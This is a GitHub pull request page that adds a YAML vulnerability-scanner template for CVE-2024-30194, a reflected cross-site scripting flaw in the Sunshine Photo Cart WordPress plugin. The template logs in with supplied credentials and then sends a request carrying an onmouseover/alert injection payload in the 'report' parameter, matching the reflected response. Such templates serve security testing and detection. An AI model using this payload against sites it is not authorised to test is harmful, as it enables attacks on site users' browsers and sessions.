Skip to content

Added CVE-2024-30194 Template #14691

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Merged
pussycat0x merged 2 commits into from
Jan 5, 2026
Merged

Added CVE-2024-30194 Template #14691

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
3c23a66
Added CVE-2024-30194 Template
0xanis Jan 3, 2026
878b769
Use Flow CVE-2024-30194.yaml
Akokonunes Jan 5, 2026
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
60 changes: 60 additions & 0 deletions http/cves/2024/CVE-2024-30194.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,60 @@
id: CVE-2024-30194

info:
name: Sunshine Photo Cart <= 3.1.1 - Reflected Cross-Site Scripting
author: 0xanis
severity: medium
description: |
WP Sunshine Sunshine Photo Cart versions up to 3.1.1 contain a cross-site scripting caused by improper neutralization of input during web page generation, letting attackers execute malicious scripts in users' browsers, exploit requires attacker to craft malicious input.
impact: |
Attackers can execute malicious scripts in users' browsers, leading to session hijacking, defacement, or redirection.
remediation: |
Update to the latest version of Sunshine Photo Cart.
reference:
- https://wpscan.com/vulnerability/8fe6645b-c11d-4075-89c1-f6a01dfb3a0e/
- https://patchstack.com/database/vulnerability/sunshine-photo-cart/wordpress-sunshine-photo-cart-plugin-3-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-30194
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-30194
cwe-id: CWE-79
metadata:
verified: true
max-request: 2
vendor: wpsunshine
product: sunshine-photo-cart
framework: wordpress
tags: cve,cve2024,wordpress,wp-plugin,xss,sunshine-photo-cart,authenticated,kev

flow: http(1) && http(2)

http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP+Cookie+check

log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1

matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(tolower(all_headers), "wordpress_logged_in")'
condition: and
internal: true

- raw:
- |
GET /wp-admin/edit.php?post_type=sunshine-gallery&page=sunshine-reports&report=orders%22%20onmouseover=alert(document.domain)%3Bthis.remove()%3B%20style=position:fixed%3Bleft:0%3Btop:0%3Bwidth:100vw%3Bheight:100vh%3B HTTP/1.1
Host: {{Hostname}}

matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "onmouseover=alert(document.domain);this.remove(); style=position:fixed;left:0;top:0;width:100vw;height:100vh;", "Sunshine Photo Cart")'
condition: and
Loading